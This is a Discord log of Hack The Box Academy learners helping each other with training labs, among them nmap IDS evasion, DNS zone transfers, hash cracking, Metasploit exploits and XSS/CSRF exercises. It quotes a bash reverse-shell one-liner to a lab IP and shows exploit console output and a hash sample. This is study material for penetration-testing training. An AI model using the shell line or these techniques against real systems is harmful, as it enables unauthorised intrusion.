#modules

1 messages · Page 318 of 1

cloud urchin
#

it goes over it..

#

there's a section about authentication mechanisms that talks about it

novel lynx
#

I read this like 10 times and didn't know what they meant: When using Windows Authentication, we need to specify the domain name or the hostname of the target machine. If we don't specify a domain or hostname, it will assume SQL Authentication and authenticate against the users created in the SQL Server. Instead, if we define the domain or hostname, it will use Windows Authentication. If we are targetting a local account, we can use SERVERNAME\accountname or .\accountname. The full command would look like:

cloud urchin
#

that makes sense to me

novel lynx
#

let's switch brains please

wanton idol
#

makes sense to me too T-T

#

are u still confused?

cloud urchin
#

think about it this way, one is windows auth which is the same account you use to log into your windows computer. the other one is a login for a service, sql, which is separate from your windows logon because it's provided by the service

#

just like your discord login is different than your windows login

#

but you can setup sql to auth to your windows account instead of the sql server account

novel lynx
#

that makes sense, i just didn't realize there was a flag you could use to specify

cloud urchin
#

now go get that flag

novel lynx
#

i really hope so, i've been on this module all day

#

got the flag, like three hours longer than i would have liked due to the windows auth fiasco

cloud urchin
#

but now you'll never forget

distant island
#

SQLMap Essentials -skill assessment i need help with this i already got the attack vector and bypass the filter and managed to see two databases but cannt continue to FLAG

#

NVM there was a typo in the FLAG db

eager ledge
#

Hi everyone,

I am doing the "Phishing" section of "Cross Site Scripting" module:https://academy.hackthebox.com/module/103/section/984

When I use the exact same payload as shown in the reading material, I get slightly different rendering. So, I changed the payload a bit and added <script> to it so that the end rendering looks like (see attached). I have webserver running on my end and and I have also tried sending test values. I do receive these values on my end. However, when I pass this URL to the send.php, all I get is Issue in sending URL. I am not sure what I am doing wrong 😦

whole grotto
#

Do t0 modules give back the cubes that are spent.

fathom pendant
#

Yes

whole grotto
#

What bout t1

fathom pendant
#

20%

whole grotto
#

So if the module cost 100c. I will get 20c back

#

?

fathom pendant
#

Yes

#

It's 20% for all non t0 modules

whole grotto
formal sphinx
#

Hy guys, i am currently working through password attacks and i am stuck on hard lab, so here is the situation. I got SAM and SYSTEM files, so i extracted hashes but the problem is that multiple rows have same has, so i tried to crack the has and i got blank. So I tried to insert it directly, it didn't work and i also tried mulitple PtH tecniques and none work, can someone help?

acoustic owl
acoustic owl
eager ledge
formal sphinx
acoustic owl
eager ledge
safe star
#

username and pass

acoustic owl
safe star
#

i used netcat to catch it

eager ledge
safe star
#

just did this 10 mins ago

safe star
formal sphinx
acoustic owl
#

Oh, I probably mixed it up. This is the task with the vhd file, right? Yes, then there is only one file.

formal sphinx
#

Thank you so much, it worked

unique ether
#

Footprinting is taking me way too long to finish

glad patio
#

hey guys, could anyone please hint me with this one? I'm stuck

glad patio
vague tundra
#

This is a good one lol

hexed tartan
#

Hello i got problem with Network Enumeration with Nmap/Host and Port Scanning someone help?

#

I submitted the flag "case-sensitive" but doesn't accept it

foggy monolith
hexed tartan
#

thanks a lot

valid ridge
#

Hello in still new where can I chat general is closed I can talk there

valid ridge
#

What's this server for

hexed tartan
smoky marten
acoustic owl
valid ridge
#

Ohh thx

hexed tartan
#

Hi im working on Network Enumeration with Nmap/ **Firewall and IDS/IPS Evasion - Hard Lab ** On my Own i know that for bypass IDS/IPS know to scan the target lowest, i used -T0 and -T1 flag for find this services version, but nmap dubug mode said me about 8 hours to complete lol, any tips?

hexed tartan
whole grotto
hexed tartan
whole grotto
#

I recommend using -T4 when scanning reasonably modern and reliable networks. Keep that option (at the beginning of the command...

#

-T4 prohibits the dynamic scan delay from exceeding 10 ms for TCP ports and -T5 caps that value at 5 ms.

#

So you need a real fast connection to use -T4

hexed tartan
whole grotto
#

T0 is the slowest scan, also referred to as the "Paranoid" scan. This option is good for IDS evasion

#

If u rlly paranoid

hexed tartan
#

i just stuck on this

gilded radish
#

read module again

whole grotto
#

Cause its slow

gilded radish
#

there should be a script or some flag that enum hostname

whole grotto
#

But if u know its ssh

#

Just use -p 22

hexed tartan
whole grotto
#

With -sC

unique ether
#

How can I access rockyou

#

On pwnbox

whole grotto
#

Check /opt for seclist

gilded radish
#

@hexed tartan what the question

hexed tartan
hexed tartan
gilded radish
#

the question, not a hint

hexed tartan
unique ether
#

But I cant access

gilded radish
#

but -sV is the answer

hexed tartan
gilded radish
#

if there is smb service, than you should use some script I believe

unique ether
hexed tartan
hexed tartan
unique ether
hexed tartan
hexed tartan
#

only found are 22 80

fathom pendant
#

Nmap hard lab

#

?

hexed tartan
unique ether
#

I thought I had sudo

hexed tartan
fathom pendant
#

Utilize some of the scan techniques referred to in the "ids/ips" evasion reading, substituting the specific port for all ports

hexed tartan
#

might be redis? idk im trying

unique ether
#

btw which hash is this 93c887ae8200000052f17511d0fd3b9a08350b045e118a2cd0c311777576080bc13a5581d522cdb5a123456789abcdefa123456789abcdef140561646d696e:3541221bac8d7e76f34e45697aed40edfbe87fd8

#

what does it belong to

hexed tartan
#

Our client also mentioned that they were forced to add a service that plays a vital role for their customer because they require large amounts of data. --> only thing that come in my mind is a service database port

fathom pendant
fathom pendant
#

Just scan for all ports using some of the techniques referred to

fathom pendant
whole grotto
fathom pendant
hexed tartan
fathom pendant
unique ether
#

BMC

#

section

#

i got it

fathom pendant
#

BMC???? That doesn't sound familiar

unique ether
#

hmac sha1

fathom pendant
#

You mean ipmi?

unique ether
fathom pendant
#

The section tells you what mode to use

#

And even if you search example hashes in hashcat for ipmi you'll find it

unique ether
#

yea i cracked it

coral trout
#

Hey guys I'm just getting to know tech and I will be interested to go into cyber security please where can I start from so I get good starting knowledge

unique ether
#

but i just wanted to find which algorithm it was from

hexed tartan
#

if i use -A i'm ripped

compact patrolBOT
unique ether
#

i didnt read the outpuit properly

fathom pendant
fathom pendant
hexed tartan
#

gosh is the second alert lol

unique ether
fathom pendant
fathom pendant
#

But look at all the techniques specifically from the section prior to the skill exam

hexed tartan
unique ether
#

Are the skill assessments enough to pass the exam?

#

Or u need to do extra boxes as well

acoustic owl
# unique ether Or u need to do extra boxes as well

If you have understood all the attacks discussed in the modules and know why they work the way they do, then you are ready for the exam.
Otherwise, it may be useful to read through individual topics again or try them out in machines

hexed tartan
#

idk why decoy doesnt work i used --disable-arp-ping too

#

and worked

#

he found the filtered

limpid hemlock
#

Hey in the web attack skill assesment i found a uid for administrator can i modify the request to be administratr from htb student account that i am now in

#

I dont knw how to get the token for administrator so that i can modify a get reqyest to kinda get to administrator panel

acoustic owl
limpid hemlock
#

Got it changed uid in storage and vola i was stuck here for some time

ember fern
#

I got that many, many times

shut vapor
#

Attacking Common Services > DNS
||I see the subdomain containing the flag does not allow queries. It only allows zone transfers. Can you even capture this flag with subbrute or dnsenum in this lab? DM's are open if discussing in public is a spoiler minefield.||

spiral basalt
#

Okay, I need a little bit of help now. I have been trying to do the 'Metasploit Fundamentals' module, and I am stuck on the 'Modules' section. I have been working on this for days, I have set the appropriate RHOST, the RPORT is correct, I was doing it on a VM, so i figured maybe my metasploit was messed up.

I have updated it, uninstalled and reinstalled, reloaded from VM snapshot. I have tried using the eternal romance and eternalblue exploits. And yes, I was setting LHOST to tun0. I have cancelled and rerun openvpn many times, I have installed new files, I have used different servers, I have terminated and respawned the target (and yes, I changed RHOST when I respawned the target.)

Eventually I gave up on using my VM and tried to do it via pwnbox instead, figuring that I can figure out what the difference is between the two later. Pwnbox did not work either. I left my LPORT and LHOST as default because the pwnbox doesn't use a vpn. I have the right RHOST. I have tried different LPORTS and I know that the EternalRomance exploit can be a bit finnicky, so I have repeated it in case of connection issues. If I am lucky, I get the following output:

' Started reverse TCP handler on 94.237.50.148:4444
[] 10.129.179.36:445 - Target OS: Windows Server 2016 Standard 14393
[
] 10.129.179.36:445 - Built a write-what-where primitive...
[+] 10.129.179.36:445 - Overwrite complete... SYSTEM session obtained!
[] 10.129.179.36:445 - Selecting PowerShell target
[
] 10.129.179.36:445 - Executing the payload...
[+] 10.129.179.36:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created. '

I have tried doing this independantly, I have tried looking up people experiencing the same issue, and I have even tried doing it via HTB's Pwnbox, and nothing works, I would greatly appreciate some help.

frosty ferry
#

When i login into htb server using ssh

#

The terminal is so laggy

rare sky
shut vapor
frosty ferry
#

Should i be using tcp or udp?

#

I am using us academy 6 rm

#

It has low load

forest gust
#

HI i need help with Module Attacking Common Applications Part osTicket I don't fully understand where to go after I looked at the ticket I created
i find llfreight@access1! but don`t work

rare sky
spiral basalt
main halo
#

How many hrs a day should I do htb A to finish cbbh im 8 months pls reply or @ as I'm going to sleep rn

shut vapor
spiral basalt
fathom pendant
fathom pendant
#

You have to sign in though

#

As noted by the message above

#

From the sample output with the 2 users and passwords one of them should work

limpid hemlock
#

Hey i chNged the password for admin using a burp get request in skill assesment section of web attacks but i dont see any change in tha main webpage

fathom pendant
limpid hemlock
#

Yup

forest gust
limpid hemlock
#

I chNged the uid in memmry and shows me as administrator in the main page

fathom pendant
#

There should be an add event button or something like that on the admin page

limpid hemlock
#

Noo

#

Not seeing any changes in the page even after i changed the administration password

fathom pendant
#

Like I said though you need to log in

#

Not change your uid

limpid hemlock
#

Ohhh

#

Darn

fathom pendant
#

You changed the password so just... log in? Lol

limpid hemlock
#

Yes you are right i never thought

rustic sage
#

How's life in these parts of the server?

limpid hemlock
#

I was stuck somewhere else in my mind

#

My logical thinking sucks

rustic sage
#

same

shut vapor
#

DM's open, that might be easier than dumping screen shots in main

#

Wait... I think I see the problem...

Started reverse TCP handler on 94.XXX.XX.XXX:4444
This is definitely not tun0 if you're on the VPN. Somehow you're opening a reverse connection on a public IP? Whoops?

#

I'm... uh... guessing she went offline lol.

hexed tartan
#

Nooo i can't check for my CV

ember fern
#

docker OP 🙏

hexed tartan
ember fern
#

ah sorry, not done it

hexed tartan
#

because says "hr"

wary plover
#

bro really said trust me bro Kappa

spiral basalt
next bronze
next bronze
spiral basalt
# spiral basalt Okay, I need a little bit of help now. I have been trying to do the 'Metasploit ...

Okay, for anyone looking for help on this issue, here is what I managed to do on my VM to make the shell work. Truth be told I do not know which of these changes resulted in my eventual success but here are the changes I made that must have helped me succeed.

First, I redownloaded the VPN Connection file, however I downloaded it from a lower load server, and I downloaded the TCP file instead of the UDP to help in case of packet loss.

I then terminated the target machine and spun it up again.

Lastly, I reconfigured my metasploit console, I changed the payload from the default Windows payload to a generic payload, because this was the message I noticed after restarting msfconsole

No payload configured, defaulting to windows/meterpreter/reverse_tcp

I then used the show payloads command, and decided to use payload 4

payload/generic/shell_reverse_tcp

Finally, I set my LHOST to tun0 again, for the new VPN file, set RHOSTS to the new target machine, and ran it with success. Good luck!

hexed tartan
#

whats happened here?

severe phoenix
#

Hi everyone, i'm doing the introduction of Windows events logging basic (windows event logs). The exercise consists in founding the event with ID 4624 that took place on 8/3/2022 at 10:23:25. The answer should be the name of the executable responsible for the modification of the auditing settings. I found in the event details only the reference to "services.exe". Therefore, the answer's pattern should be "TW__.exe"

Any suggestions?

wise vault
#

did HTB removed the Intro to AD module?

shut vapor
wise vault
forest gust
#

Module Attacking Common Applications (Attacking Thick Client Applications) i can`t find 0000000000003000MAP-RW--

fathom pendant
fathom pendant
#

That's entry breakpoint... not exit breakpoint

forest gust
fathom pendant
fathom pendant
#

I did not. I regretted it

quiet trout
#

@fathom pendant hey man would you humor me with an embarassing question... im trying to understand why redirecrts are used twice on cmds like bash -i >& /dev/tcp/10.10.10.99/1337 0>&1 chatgpt/c.ai no help

#

both ai's gave me opposing answers of course

fathom pendant
#

Overall module, great- fantastic even. Thick Client section and the third skill assessment

quiet trout
#

and further when you should use two and when you should not? i guess that will be apparent when i better understand it?

shut vapor
fathom pendant
#

Think about it this way: you're more or less defining where the file descriptors are being sent

quiet trout
#

i think you need to do a dig axfr

#

@Quoit ^

fathom pendant
#

0: stdin
1: stdout
2: stderr

shut vapor
fathom pendant
quiet trout
shut vapor
#

Sure, thanks ok.

quiet trout
fathom pendant
quiet trout
#

you're redirecting first, stdout and stderr (to?? stdout?) then redirecting stdout and stderr to dev/null/... which would supercede stdout?

#

because the redirect isnt parsed until after the cmds are executed?

fathom pendant
#

dnsenum does some voodoo magic to get the result

shut vapor
fathom pendant
#

So that it displays stuff in output

quiet trout
#

in output and /dev/null? this is seriously confusing ill look at the manual but i remember reading it previously maybe it will make more sense now

fathom pendant
sonic ravine
#

Question, am I allowed to add htb academy work to my website portfolio

quiet trout
#

oh god i get it now

fathom pendant
sonic ravine
#

Like screen shotting me working with certain tools and such and speaking about it on website/github

fathom pendant
#

Part of HTB content guidelines doesn't allow posting of academy content for modules t1 or higher

quiet trout
# fathom pendant No

see this has been the bane of my existence... these redirect operators they work opposite when nothing is next to them, if i remember correctly (and understand what i just read in the manual) ... this always fucks with me

sonic ravine
#

Ohkay ty

quiet trout
#

`Note that the order of redirections is significant. For example, the command

ls > dirlist 2>&1
directs both standard output (file descriptor 1) and standard error (file descriptor 2) to the file dirlist, while the command`

#

am i understanding that correctly? maybe that has nothing to do with what im talking about

fathom pendant
quiet trout
#

ah, you da man

#

seems like i need to re-read this whole thing i prob got glazed over and didnt finish the chapter

fathom pendant
#

It's duplicating the file descriptors to the tcp connection

#

The "file" in this instance is the tcp connection /dev/tcp/ip/port

#

Soft reminder everything in linux is a file

quiet trout
#

ok that makes sense

#

reading the example part in that subsection you just mentioned... jesus... they're redirecting errors from files used as stdin and using it in the example explanation...? how can a file have errors, and we're talking exit code errors here right? or those plus any other errors?

#

or is it redirecting errors made when running the cmd from a file used as stdin? i just dont why wouldnt you redirect that to errors to stdout in that case... this makes little to no sense

#

nvm

#

i need to re-read this whole thing, again, then re-read it again

fathom pendant
quiet trout
#

but i do feel like i understand what i need to, at the moment.

fathom pendant
#

And it will error without you knowing

quiet trout
#

gotcha, this has been illuminating

fathom pendant
sonic ravine
#

Can I used the pawn box to access certain applications?

#

To post content?

quiet trout
#

i freaking get it now, fingers crossed i dont forget.

finite abyss
#

Anyone did the TLS/SSL attack module on CWEE path
I am getting this error when trying the Heartbleed section. basically, any lab using the TLS-Breaker tool

finite abyss
#

This is the error I am getting

rough flame
#

I think it works with jdk-11

eternal lodge
#

Yo

finite abyss
# rough flame I think it works with `jdk-11`

java -version openjdk version "17.0.11" 2024-04-16 OpenJDK Runtime Environment (build 17.0.11+9-Debian-1deb12u1) OpenJDK 64-Bit Server VM (build 17.0.11+9-Debian-1deb12u1, mixed mode, sharing)

#

Let me install in Pwnbox if it allows

finite abyss
#

Yeah , you are correct
running using java11 solved the issue
Java-11 executable is at /usr/lib/jvm/java-11-openjdk-amd64/bin/java
It is already installed

quasi moth
#

Is academy referral links works if I invited a friend who already had an academy account and bought sub?

#

Or only for new new members

pallid wing
#

Hello, I'm working on the phishing section of the XSS module. Everything works perfectly, except when I try to send the URL through send.php. It tells me that there was an issue sending the URL. I've tried several different ways; could the module be malfunctioning?

hexed tartan
#

Hello i stuck on this Information Gathering web edition/Virtual Host, i found 2 subdomains using gobuster after i add to the host all subdomains found i tried to found other one, but i couldnt find anything some help?

hushed sail
hexed tartan
hushed sail
# hexed tartan yes

hang on. send that screenshot again. you don’t need separate lines for subdomains

ocean night
#

In DMs please.

hushed sail
#

yeah DM me

hexed tartan
fathom pendant
hexed tartan
hushed sail
fathom pendant
#

Discord doesn't notify for dm requests generally

torpid copper
#

@fathom pendant do you know why it shows me no password hash loaded? i have changed the format but it always shows me no password hash loaded

fathom pendant
#

It's likely though bc the hash itself is what's before the : so john isn't recognizing it

torpid copper
#

how to crack it if i have a hash and the salt? @fathom pendant

fathom pendant
#

what academy module is it related to and have you tried GPT and google? ¯_(ツ)_/¯

modest remnant
#

some of the content/wording in the modules is...interesting. In the intro to Linux package management section they mention installing 'git', then talk about impacket for a few paragraphs, then say 'now that git is installed...' o_0

nova ginkgo
#

Hello everyone can anyone help me pls

module:Using Web Proxies
skills assesment

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

I did everything but didnt work

fathom pendant
north bramble
#

Hello I am on kernel exploits, linuxprivesc. pls help

obtuse verge
#

Hello. Is anyone available to give me a hint in the Skills assessment of the 'Advanced XSS and CSRF'? Stuck on the file upload. Tried multiple extensions and even changed the Content type

steady charm
#

For Windows Privilege Escalation/Citrix Env Breakout
How do I exit full screen from the Citrix environment. I am stuck, not being able to transfer the tools required for privesc

nova ginkgo
fathom pendant
#

all the steps i stated are in the payload processing part

#

adding prefix, and re-encoding

#

remember to get to that 31 character almost hash -- you decoded twice

#

so you have to re-encode it in the reverse order

nova ginkgo
fathom pendant
#

because your account isn't linked

#

but i told you all that you need to know

steady charm
steady charm
nova ginkgo
fathom pendant
#

you need to use the whole cookie value

#

because again; the cookie needs to be in the format you found it in

#

before decoding

nova ginkgo
#

I have to use full hash ?

fathom pendant
#

yes

median gale
#

shells and payloads skill assesment host 1

#

found both upload points

#

on the one although it uploads the .aspx i cant access it afterwards by bowsing on the upload configuration path the same way as described on the module

#

On the other i cant upload the war file and i get a 403 error cause "Manager is only accessible from a browser running on the same machine as Tomcat"

#

Found some writeups that didnt encounter any of these any idea what might cause these problems?

north bramble
fathom pendant
median gale
fathom pendant
median gale
#

yes

fathom pendant
#

then you should be able to upload it directly from the manager page

#

¯_(ツ)_/¯

#

no fancy crazy nonsense

median gale
#

I know but i am not ...

fathom pendant
#

i don't recall ever encountering that 403 error

#

i just rememeber generating the war file with msfvenom --> logging in --> uploading

novel lynx
#

ATTACKING COMMON SERVICES/Attacking DNS. I keep waiting for one module that doesn't get me stuck. I can't find any DNS records for inlanefreight.htb, been at it for two hours now. I found 6 records using subbrute for inlanefreight.COM but nothing for .htb, i am lost. Dig doesn't work. Dig AXFR doesn't work. Subbrute doesn't work.

fathom pendant
#

you need to specify the nameserver with @spawned_ip

#

because .htb isn't a valid tld, without specifying it's trying to query public nameservers to find it

#

so public nameservers can find it without needing to specify it

novel lynx
#

like this?? dig AXFR @10.129.217.140 inlanefreight.htb

cloud urchin
#

yeah i think that works, try it

novel lynx
#

dig AXFR @10.129.217.140 inlanefreight.htb

; <<>> DiG 9.18.24-1-Debian <<>> AXFR @10.129.217.140 inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

#

nope

cloud urchin
#

i just ran the same exact command worked no problem

#

make sure you specify the correct name server IP

novel lynx
#

is that not the spawned target ip?

fathom pendant
#

also make sure you don't have anything in your /etc/hosts related to inlanefreight.htb

cloud urchin
#

it is, the target you spawn is the name server for this lab

fathom pendant
#

whatever the IP is that popped up when you spawned the target IP

novel lynx
#

still not working: dig AXFR @10.129.217.140 inlanefreight.htb
nothing regarding inlanefreight.htb in /etc/hosts file, and verified this ip is the spawned target IP

cloud urchin
#

try restarting the target

novel lynx
#

ok

cloud urchin
#

also you seem to have an old version of dig, maybe update your box

#

i'm using 9.20.1-1-debian

fathom pendant
novel lynx
#

using parrot pwnbox, restarted target box and instance: dig AXFR @10.129.237.204 inlanefreight.htb

; <<>> DiG 9.18.24-1-Debian <<>> AXFR @10.129.237.204 inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

north bramble
fathom pendant
#

does your /etc/hosts file have anything inlanefreight.htb in it?

fathom pendant
#

but it looks like you compiled it with the wrong GLIB_C

#

if you compiled it on your system, it used your system's glibc

novel lynx
north bramble
fathom pendant
cloud urchin
novel lynx
#

provided attack box

fathom pendant
#

i'm assuming you're not also weirdly running the vpn on your own machine

cloud urchin
#

maybe try terminating the attack box, doing a hard refresh on the website, re-spawning the target after the hard refresh, start up the pwnbox, and try again

safe star
#

i found it in 5 seconds

cloud urchin
#

the dig command doesn't use a wordlist

safe star
#

he said he didnt find any subdomains with subbrute

cloud urchin
#

its just an axfr request

novel lynx
#

but let me try hard restarting the pwnbox now

safe star
#

did you add the target ip in the resolver file?

#

and only the target ip

fathom pendant
#

let's tackle this one step at a time

novel lynx
#

❤️

fathom pendant
#

the first issue being: the base axfr not going through in the first place

#

when it absolutely should

#

the subbrute doesn't come in until the end

safe star
#

mine didnt either

#

only worked on the subdomain

cloud urchin
#

no, it works on the base domain

#

i just did it with the exact command he's running

safe star
#

hmm

novel lynx
#

shut down the browser, hard reset everything, just spawned: dig AXFR @10.129.185.250 inlanefreight.htb

; <<>> DiG 9.18.24-1-Debian <<>> AXFR @10.129.185.250 inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

cloud urchin
#

can you switch regions with the pwnbox?

#

i always use the vpn, i think downloading a vpn file in a region will change the lab region? not sure marcielee probably knows though

novel lynx
#

i could terminate the pwnbox and change location, should i try UK or something?

fathom pendant
#

¯_(ツ)_/¯

#

i don't use the pwnbox often

#

only when i'm lazy/don't already have my vm running

novel lynx
#

i guess i need to just take the time to download a vm on my desktop, cause this has been so time consuming as of late

cloud urchin
#

tbh it's a much better experience

safe star
#

im confused why its not working for me either

cloud urchin
#

i just spawned the pwnbox and tried, works fine

novel lynx
#

glad i'm not the only one haha misery loves company

cloud urchin
#

i'm on eu academy 4 apparently

#

i wonder if they fixed the us servers yet

novel lynx
#

i'm going to try the uk first, then i guess set up a vm if it doens't work

fathom pendant
novel lynx
#

tried CA and UK with no luck

fathom pendant
#

subbrute is the way to go though

cloud urchin
#

lmao

safe star
#

thats what im saying

fathom pendant
#

that lmao makes me think he spawned footprinting

#

not common services

novel lynx
#

ATTACKING COMMON SERVICES

fathom pendant
#

but yeah remove all entries in the resolvers.txt

#

and just put in the IP

cloud urchin
#

oops

#

i was doing footprinting

fathom pendant
#

i was talking about the other braincell helping kek

safe star
fathom pendant
#

yeah it's intentional to not be able to axfr the base domain

#

but you can axfr to the domain discovered via subbrute

north bramble
novel lynx
safe star
#

not on the base domain

mild glade
#

If student subscription about to end and I'm half way in a module, will the module lock when the sub end? , If so, will it lock at the same day the sub ends ?

safe star
novel lynx
safe star
#

yeah the same command u were running before

#

just have the target ip the only entry in resolvers.txt

novel lynx
#

ok trying very soon

#

doing this echo "10.129.9.221" > ./resolvers.txt

shut vapor
#

Same module I brought up earlier. Attacking common services > DNS

#

It's a silly, synthetic scenario IMO.

fathom pendant
#

it's possible to encounter

#

so i wouldn't discount it

shut vapor
#

Bind is configured to disallow querying, but allow axfr.

#

In my experience, dnsenum and subbrute alone won't do it. He's on the right path using axfr tho.

novel lynx
#

python3 subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt

shut vapor
novel lynx
#

the command is getting stuck after revealing inlanefreight.htb

fathom pendant
#

in this section specifically subbrute is the way to go

fathom pendant
fathom pendant
#

it's going through the names.txt list

shut vapor
#

If you tell me how to get the flag with subbrute I'd very much appreciate it.

fathom pendant
#

just be patient

novel lynx
#

oh wait i'm just not patient

fathom pendant
#

subbrute gives you a subdomain you can transfer to

#

it's as shrimple as that

novel lynx
#

how long do i wait? until it's done?

fathom pendant
#

what subbrute does is basically fuzzing, i haven't dove into the source code to be entirely sure

fathom pendant
safe star
fathom pendant
#

try each domain in another terminal while you wait

novel lynx
#

smart

novel lynx
#

got the flag ❤️ ❤️ ❤️

fathom pendant
#

gz ez

novel lynx
fathom pendant
#

they are separate domains entirely

novel lynx
#

so but how was i supposed to know to put the target ip there?

fathom pendant
#

think of resolvers.txt as a pseudo hosts file

#

if you don't know the nameserver, it doesn't hurt to use the ip

safe star
#

thats the only name server

shut vapor
novel lynx
shut vapor
#

no need to... but if you did you can find the flag there too.

fathom pendant
#

i mean an alternative i believe is doing an nslookup for it nslookup inlanefreight.htb spawn_ip

#

then put that nameserver in your hosts file and use that in the resolvers file

#

¯_(ツ)_/¯

#

but it's 100% doable with subbrute as shown just now

#

not to mention you won't always have access to the box that's running the configuration

novel lynx
#

nslookup inlanefreight.htb 10.129.9.221
Server: 10.129.9.221
Address: 10.129.9.221#53

*** Can't find inlanefreight.htb: No answer

fathom pendant
#

so knowing how the tool works

shut vapor
#

Wait, is it? You still had to dig axfr the subdomain, didn't you @novel lynx

fathom pendant
fathom pendant
fathom pendant
#

i didn't say subbrute was the only solution

#

it just gets you to the answer

shut vapor
#

Oh ok, misread

fathom pendant
#

it bruteforces a list of words to test for subdomains on a server

#

can't be bothered to dive into the source code to see what it actually does under the hood

novel lynx
#

ya i guess i need to start inspecting tool documentation more often

fathom pendant
#

sub[domain]brute[force]

novel lynx
#

thanks for the help though everyone! it has been one rabbit hole after another for me lately

shut vapor
#

Happy hacking!

novel lynx
#

"Happy"

fathom pendant
#

"hacking"

shut vapor
novel lynx
unique ether
safe star
#

no

#

what module @median gale

fathom pendant
#

The passwords don't change every spawn

#

There's only one valid login for the users

median gale
median gale
fathom pendant
#

And each service has a unique user

median gale
#

for one user

safe star
#

which part

fathom pendant
#

Then you're doing something wrong :p

median gale
median gale
fathom pendant
#

Either way try avoiding posting screenshots since the module is not t0

#

I don't recall hydra giving false positives though

ocean night
#

🤦‍♂️

#

Please stop pasting screenshots with outputs like that

fathom pendant
#

Try changing vpn regions

crystal gyro
#

Hey all, I'm still learning I'm on "Learn the basics of Penetration Testin" Tier 1, but a box gicing me a headache. Is it okay to ask it here?

median gale
fathom pendant
ocean night
#

If it was spoiler free, it wouldn't have been removed

fathom pendant
#

It's a module > t0

crystal gyro
fathom pendant
#

Try with nxc instead of hydra, see if the results are the same

fathom pendant
crystal gyro
#

welp, need my indentifier find first lmao

fathom pendant
fathom pendant
#

It's not emailed or delivered to you in any form

median gale
crystal gyro
#

Sorry for it. 😅 found it

rich mulch
#

I am stuck at Skill Assestment II - Deserialization Attacks, any hints?

fathom pendant
safe star
#

@median gale i got it

#

u shouldn't need the user.list if you check who has rdp permissions with winrm

fathom pendant
#

And the expected way is via bruteforce

tribal sapphire
#

Hi guys, I'm really really stuck at Skill Assessment - Advanced XSS and CSRF Exploitation , any advice? I was able to get the moderator upgrade but I can't make anything work from that point

safe star
#

oh yeah

fathom pendant
#

Though creating a userlist from C:/users/ isn't a bad idea

#

I believe that's what I did and started deleting from the new list

median gale
fathom pendant
median gale
#

It respawns automatically

fathom pendant
#

I don't ever trust that

#

I always manually reset it to be sure

median gale
cloud urchin
median gale
safe star
#

i did net localgroup > net localgroup "Remote Desktop Users"

#

u can just use the wordlists tho

fathom pendant
#

if he's continuously getting false positives something is telling me it's something up with the environment being spawned for him

median gale
safe star
#

winrm

fathom pendant
#

with the user you have winrm for

fathom pendant
#

LOL sharing flags is definitely a nogo

median gale
#

How will i proceed?

safe star
#

😭

#

i just told you how

cloud urchin
#

the module is a writeup

fathom pendant
#

yeah

#

it's the environment spawning for him

#

i'm not getting any false positives running hydra on a spawned target for me

#

US-2

tribal sapphire
fathom pendant
#

also try terminating then restarting the target to ensure no weird backend shenanigans

median gale
safe star
#

wym

fathom pendant
# safe star 😭

i also found it funny that doing this, i actually got "potentially valid account but not active for rdp" for the previous users kek

safe star
fathom pendant
#

yep did it twice and got the expected result

#

no weird false positives

#

so it's 100% the spawn environment being broken for you

#

it's weird that when you change vpn regions and respawn the target though it doesn't let you try and connect

#

but like i said you may need to Terminate, then restart

#

not using the restart button

median gale
safe star
#

you on the pwnbox?

median gale
fathom pendant
#

oh yeah changing the vpn region when using the pwnbox is annoying

median gale
safe star
fathom pendant
#

also when you changed vpn region, did you redownload the vpn pack?

median gale
fathom pendant
#

And you stopped and restarted the vpn with the new pack

median gale
#

ctrl c, new file with openvpn

fathom pendant
#

I'd reach out to support then

#

¯_(ツ)_/¯

median gale
#

Send the screenshots

fathom pendant
#

Like I said it worked fine for me on my own machine on us academy 2

median gale
#

Let my try us 2

#

me*

cloud urchin
tribal sapphire
fathom pendant
cloud urchin
#

well you can exfil to the exfil server

fathom pendant
#

Also not being able to ping isn't always a sign that it's not working

#

Generally by default Windows blocks ICMP echo requests

median gale
tribal sapphire
# cloud urchin well you can exfil to the exfil server

I can't reach exfil, I tried with lot of things but in burp it seems the request is flying out, even with the dev tools I can see it within the network tab but I don't have any new log on exfil.htb/log even with burp collab,

fathom pendant
median gale
#

Yes it runs prints couple of false postives and then becaume unreachable

fathom pendant
#

Interesting

#

Reach out to website support then

#

Green bubble on academy

cloud urchin
safe star
#

thats what i usually use to stop it

median gale
#

Seems like and overkill

fathom pendant
#

It's to ensure no weird rogue openvpn processes are running

#

Which may be clogging your routes

tribal sapphire
# cloud urchin maybe i'm confused how far you are then. i thought you said you had moderator st...

`Yeah sorry I'm not a native speaker, emm I did the open redirect + CSRF to get the moderator upgrade.

Then I got the access to write on the task.php, since it has CSP I can't send anything out but using the open redirect it may work (I tried it and nope), hence I decided to use the file upload funcitonality to store the XMLHttpRequest script/request there to be called from task.php.

This is what I tried, lot of different ways to write the sames scripts. Same ideas, get admin.php content with GET request and send it with a POST to exfil, nothing it's working

cloud urchin
#

that's why i said it's probably something with your code

#

you should probably delete your msgs though its giving a lot away

cerulean hinge
#

Hello.
Can I have some help please for the "Active Directory Enumeration & Attacks" module ?

I'm performing the "Attacking Domain Trusts - Child -> Parent Trusts - from Linux" and i'm stuck to answer the question.

Thanks

cloud urchin
#

which question there are 3.. maybe say what you're stuck on

cerulean hinge
#

No it's the linux part there is only one

cloud urchin
#

ahh yeah i see

#

i was looking at cross trusts

#

they give a one liner that does it all

cerulean hinge
#

Yes but I was trying on my own

fathom pendant
#

that's the one where you gotta raise the child yeah?

#

to do it from your machine instead of the parrot machine that's on the network you'll need to pivot through the network afaik

cloud urchin
#

it's pretty step by step

fathom pendant
#

unless i'm fully misremembering

cloud urchin
#

either way works, i did it without pivoting

cerulean hinge
#

thanks it worked I was making a stupid mistake... I'm good with HTB for today I think 😅

runic spoke
#

hello

cloud urchin
#

you should delete those pics as it's a t1 module

runic spoke
cloud urchin
#

you can just link the page and describe the issue too

novel lynx
#

@cloud urchin got the flag for SMTP 💪 needed help from gpt to figure out how to login to the email. Thankfully it didn't steer me wrong though.

cloud urchin
#

chatgpt is a powerful tool if used correctly
